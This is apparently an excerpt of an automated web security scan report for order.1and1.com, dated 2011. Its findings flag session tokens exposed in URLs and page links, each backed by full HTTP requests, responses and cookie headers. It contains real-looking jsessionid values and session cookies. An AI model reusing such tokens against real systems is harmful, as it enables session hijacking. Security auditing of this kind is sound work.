<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=News&amp;page=switch&amp;linkOrigin=News&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Microsoft Sharepoint</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Domaininfo;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">All About Domains</a>
...[SNIP]...
<li class="first-level"><a class="core_button_normal" href="/xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Service &amp; Support</a>
...[SNIP]...
<li class="two-rows"><a class="core_button_normal" href="/xml/order/International;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">International Customers</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/NewsIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">iStockphoto</a>
...[SNIP]...
<li class="lastItem-NoBorder two-rows"><a class="core_button_normal" href="/xml/order/NewsAwards;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Awards &amp; Recognition</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_cnb.gif" alt="" width="126" height="90">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_vps.jpg" alt="" width="130" height="90">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/popupSearchAdvertisingOffer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_marketingcenter.jpg" alt="" width="129" height="88">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/popupSearchAdvertisingOffer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a class="core_button_normal" href="/xml/order/NewsIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_istock.gif" alt="" style="float: right; margin-left: 10px;" width="115" height="31">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/NewsIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/feature_visual_blog.jpg" alt="1&amp;1 Blog" width="129" height="88">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/feature_visual_map.jpg" alt="1&amp;1 Geographic Map" style="float: right; margin-left: 10px;" width="129" height="88">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a class="core_button_normal" href="/xml/order/NewsAwards;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_no1webhost.jpg" alt="No. 1 Web Host" style="float: right; margin-left: 10px;" width="129" height="88">
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/NewsAwards;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">View awards &amp; recognition</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/popupMsGold;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/new_microsoftgold.gif" alt="Microsoft Gold Partner" style="float: right; margin-left: 10px;padding:5px;background:#e9f0fa" width="130" height="63">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/popupMsGold;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/popupSymantec;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/new_symantec_freetrial_small.jpg" alt="1&amp;1 Dynamic Content Library" style="float: right; margin-left: 10px;" width="129" height="88">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/popupSymantec;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_enhancedhosting.jpg" alt="" style="float: right; margin-left: 10px;" width="129" height="88">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/feature_visual_wsb_new.jpg" alt="" style="float: right; margin-left: 10px;" width="129" height="66">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/feature_visual_photogallery_new.jpg" alt="1&amp;1 Dynamic Content Library" style="float: right; margin-left: 10px;" width="129" height="66">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=News&amp;linkOrigin=News&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.88. http://order.1and1.com/xml/order/News

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/News

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/News;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:15 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=AZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:52:22 GMT; Path=/
ETag: edde5942d29d19678a705797aa76065e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28632


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.89. http://order.1and1.com/xml/order/PrivacyPolicy

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/PrivacyPolicy

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/PrivacyPolicy;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.privacypolicy HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:36:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/PrivacyPolicy?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.privacypolicy
Content-Length: 0
Connection: close
Content-Type: text/plain


3.90. http://order.1and1.com/xml/order/Server

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Server

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.server HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=vZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:47:42 GMT; Path=/
ETag: 1e80e3a593b677388759f6eb9a792645
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20244


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.91. http://order.1and1.com/xml/order/Server

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Server

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.server HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=vZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:47:42 GMT; Path=/
ETag: 1e80e3a593b677388759f6eb9a792645
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20244


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=Server&amp;linkOrigin=Server&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=Server&amp;page=switch&amp;linkOrigin=Server&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.tab.vps" rel="button-hd-tab-vps"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.tab.cds" rel="button-hd-tab-cds"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.tab.serverpremium" rel="button-hd-tab-serverpremium"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
</span><a class="btn btn-yellow-large btn-pos" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=weiter" rel="button-weiter"><span>
...[SNIP]...
